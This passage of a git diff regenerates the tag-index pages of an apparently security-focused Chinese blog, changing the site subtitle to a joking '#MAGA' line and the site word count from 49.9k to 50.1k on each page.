+++ b/tags/AFL/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -496,7 +496,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/CVE/index.html b/tags/CVE/index.html
index a6e3df43..3bb86052 100644
--- a/tags/CVE/index.html
+++ b/tags/CVE/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/MiniUPnP/index.html b/tags/MiniUPnP/index.html
index b73a6b43..3c3ea7fa 100644
--- a/tags/MiniUPnP/index.html
+++ b/tags/MiniUPnP/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/PE/index.html b/tags/PE/index.html
index 53570482..b7baa9a4 100644
--- a/tags/PE/index.html
+++ b/tags/PE/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/QQ/index.html b/tags/QQ/index.html
index 098a9296..e6fba721 100644
--- a/tags/QQ/index.html
+++ b/tags/QQ/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/SSH/index.html b/tags/SSH/index.html
index fbf62cba..75180763 100644
--- a/tags/SSH/index.html
+++ b/tags/SSH/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/Samba/index.html b/tags/Samba/index.html
index 34214983..05f48f2a 100644
--- a/tags/Samba/index.html
+++ b/tags/Samba/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/TCPDUMP/index.html b/tags/TCPDUMP/index.html
index dc489e20..da6486c3 100644
--- a/tags/TCPDUMP/index.html
+++ b/tags/TCPDUMP/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/USENIX/index.html b/tags/USENIX/index.html
index 9c052d7e..d29be129 100644
--- a/tags/USENIX/index.html
+++ b/tags/USENIX/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/Windows/index.html b/tags/Windows/index.html
index bc3ff97b..deaafdf5 100644
--- a/tags/Windows/index.html
+++ b/tags/Windows/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/index.html b/tags/index.html
index fe61f1f0..a775d1b4 100644
--- a/tags/index.html
+++ b/tags/index.html
@@ -157,7 +157,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -462,7 +462,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/itchat/index.html b/tags/itchat/index.html
index 37af3737..59835a12 100644
--- a/tags/itchat/index.html
+++ b/tags/itchat/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/miio/index.html b/tags/miio/index.html
index e8208e6a..01f0619a 100644
--- a/tags/miio/index.html
+++ b/tags/miio/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/python/index.html b/tags/python/index.html
index 3a6039ce..89d32b92 100644
--- a/tags/python/index.html
+++ b/tags/python/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/wifi/index.html b/tags/wifi/index.html
index ee608a29..4cf29c28 100644
--- a/tags/wifi/index.html
+++ b/tags/wifi/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/中间人/index.html b/tags/中间人/index.html
index 639a2307..38764278 100644
--- a/tags/中间人/index.html
+++ b/tags/中间人/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/二进制/index.html b/tags/二进制/index.html
index 51a7b09b..bcdbf7c1 100644
--- a/tags/二进制/index.html
+++ b/tags/二进制/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/侧信道攻击/index.html b/tags/侧信道攻击/index.html
index 139e3526..15bce0dc 100644
--- a/tags/侧信道攻击/index.html
+++ b/tags/侧信道攻击/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/取证/index.html b/tags/取证/index.html
index 17b09b09..d8d76082 100644
--- a/tags/取证/index.html
+++ b/tags/取证/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/复原文件/index.html b/tags/复原文件/index.html
index 4b12d5f3..19241699 100644
--- a/tags/复原文件/index.html
+++ b/tags/复原文件/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/密码/index.html b/tags/密码/index.html
index d7e4be80..de3ca112 100644
--- a/tags/密码/index.html
+++ b/tags/密码/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/小米/index.html b/tags/小米/index.html
index 05191e4c..07c862d3 100644
--- a/tags/小米/index.html
+++ b/tags/小米/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -522,7 +522,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/微信/index.html b/tags/微信/index.html
index e677cfd7..6754b052 100644
--- a/tags/微信/index.html
+++ b/tags/微信/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/拒绝服务攻击/index.html b/tags/拒绝服务攻击/index.html
index bb84b1fa..fb5b4e2b 100644
--- a/tags/拒绝服务攻击/index.html
+++ b/tags/拒绝服务攻击/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/数据库/index.html b/tags/数据库/index.html
index a5ec028a..311bc6d0 100644
--- a/tags/数据库/index.html
+++ b/tags/数据库/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -496,7 +496,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/数据挖掘/index.html b/tags/数据挖掘/index.html
index 2508e7b5..2393d57f 100644
--- a/tags/数据挖掘/index.html
+++ b/tags/数据挖掘/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/文件格式/index.html b/tags/文件格式/index.html
index 8d0803ee..6c9c20b5 100644
--- a/tags/文件格式/index.html
+++ b/tags/文件格式/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -496,7 +496,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/模型实现/index.html b/tags/模型实现/index.html
index 14f8fcdd..e9495f20 100644
--- a/tags/模型实现/index.html
+++ b/tags/模型实现/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/模糊测试/index.html b/tags/模糊测试/index.html
index efd25067..fa38c43d 100644
--- a/tags/模糊测试/index.html
+++ b/tags/模糊测试/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -496,7 +496,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/漏洞/index.html b/tags/漏洞/index.html
index 0f68da82..0eee16f4 100644
--- a/tags/漏洞/index.html
+++ b/tags/漏洞/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/破解/index.html b/tags/破解/index.html
index cd5957c8..0cb9a5a5 100644
--- a/tags/破解/index.html
+++ b/tags/破解/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/自然语言处理/index.html b/tags/自然语言处理/index.html
index cf0979d3..3c2e99b7 100644
--- a/tags/自然语言处理/index.html
+++ b/tags/自然语言处理/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/访问控制/index.html b/tags/访问控制/index.html
index fa6a0989..f4eeedc3 100644
--- a/tags/访问控制/index.html
+++ b/tags/访问控制/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/路由器/index.html b/tags/路由器/index.html
index 74c7758a..c05685c8 100644
--- a/tags/路由器/index.html
+++ b/tags/路由器/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/远程执行/index.html b/tags/远程执行/index.html
index dd8f73a7..72969965 100644
--- a/tags/远程执行/index.html
+++ b/tags/远程执行/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/逆向/index.html b/tags/逆向/index.html
index 6ef81640..4492b238 100644
--- a/tags/逆向/index.html
+++ b/tags/逆向/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/tags/重放攻击/index.html b/tags/重放攻击/index.html
index afdce666..af290be5 100644
--- a/tags/重放攻击/index.html
+++ b/tags/重放攻击/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>